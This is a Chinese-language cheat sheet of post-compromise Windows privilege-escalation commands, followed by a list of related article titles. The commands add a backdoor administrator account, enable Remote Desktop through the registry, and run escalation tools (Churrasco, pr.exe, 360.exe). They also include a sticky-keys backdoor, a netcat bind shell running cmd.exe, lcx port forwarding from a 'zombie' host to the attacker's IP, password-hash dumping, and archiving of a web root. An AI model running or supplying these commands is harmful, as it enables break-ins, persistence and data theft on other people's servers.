關於cmdshell提權的一些命令
CMD部分提權常用命令
ipconfig 顯示本地IP地址
net start telnet 開telnet服務
net use z:127.0.0.1c$ 對映對方的C盤
net user 檢視所有使用者列表
net user xiaoma xiaoma /add 新增使用者xiaoma密碼為xiaoma
net localgroup administrators xiaoma /add 將帳號xiaoma升級為管理員
attrib 隱藏檔案
開3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
查終端埠
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
巴西烤肉 Churrasco.exe "命令"
使用方法:
C:\RECYCLER\Churrasco.exe "net user xiaoma xiaoma /add && net localgroup administrators xiaoma /add"
C:\RECYCLER\Churrasco.exe "net user admin$ /del" 刪除帳號
query user 檢視會話
logoff ID號 踢掉
C:\RECYCLER\Churrasco.exe "logoff 1"
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
NC反彈
路徑\nc.exe -l -p 埠 -t -e 路徑\cmd.exe
c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe
NC上傳
DOS介面下執行:
NC -vv www.baidu.com 80<1.txt
-vv: 回顯
80: www埠
1.txt: 就是你要傳送的資料包
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
LCX埠轉發
先本地監聽51埠 lcx.exe -listen 51 3389
c:\recycler\lcx.exe -slave 自己的ip 51 肉雞IP 3389 LCX轉發
c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
360提權
1.開啟終端服務,埠為3389;用法:360.exe “port”
2.替換5下shift為cmd;用法:360.exe “sethc”
====================================================================
gethash使用
C:\RECYCLER\gethash.exe $local
=========================================================================
pr提權
c:\recycler\cmd.exe
c:\recycler\pr.exe
pr.exe "net user xiaoma xiaoma /add & net localgroup administrators xiaoma /add"
================================================================================
rar.exe打包命令
cmd.exe /c "\Program Files\winrar\rar.exe" a -r d:\wwwroot\1.rar d:\wwwroot
相關文章
- mssqlserver xp_cmdshell提權SQLServer
- SQL隱碼攻擊中利用XP_cmdshell提權的用法SQL
- [提權禁區] SQL語句利用xp_cmdshell獲取許可權SQL
- 利用for命令提權
- 用於提權的Linux命令,即“xxd”Linux
- 內網滲透之——mssql資料庫提權之——xp_cmdshell執行系統命令內網SQL資料庫
- 關於oracle的一些命令Oracle
- oralce關於使用者和許可權的一些命令(轉)
- 關於pfile,spfile的一些命令
- 關於 RPM 命令的權威說明
- 提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權Windows伺服器SQL
- 請教關於ANALYZE 命令的一些疑惑
- Linux、Windows提權命令速記LinuxWindows
- MSSQL隱碼攻擊提權的一些方法SQL
- 關於 `storage:link` Artisan 命令的一些思考
- Raven-1-WordPress-python命令提權Python
- 關於資料許可權設計的一些想法
- 對於ai提問一些技巧AI
- 關於master..xp_cmdshell’的幾個錯誤解決辦法AST
- Linux提權————利用SUID提權LinuxUI
- Windows提權實戰——————3、PcAnyWhere提權WindowsPCA
- [提權禁區]1433埠入侵提權
- 關於ftp的命令FTP
- 關於NTFS資料夾的安全許可權分配的一些總結
- 讀到的"關於授權"
- SQL Sever提權SQL
- Linux 提權Linux
- mysql UDF提權MySql
- Linux提權————Linux下三種不同方式的提權技巧Linux
- 關於position的一些理解
- 關於機器學習的一些看法機器學習
- 關於table的一些操作
- 關於MongoDB的一些PPTMongoDB
- 關於oracle的Spool命令Oracle
- 關於公司引入閘道器元件的提議元件
- 我來提個關於Iterator的小問題
- Linux 的計劃任務(運維基礎|可用於提權)Linux運維
- 最全的伺服器提權伺服器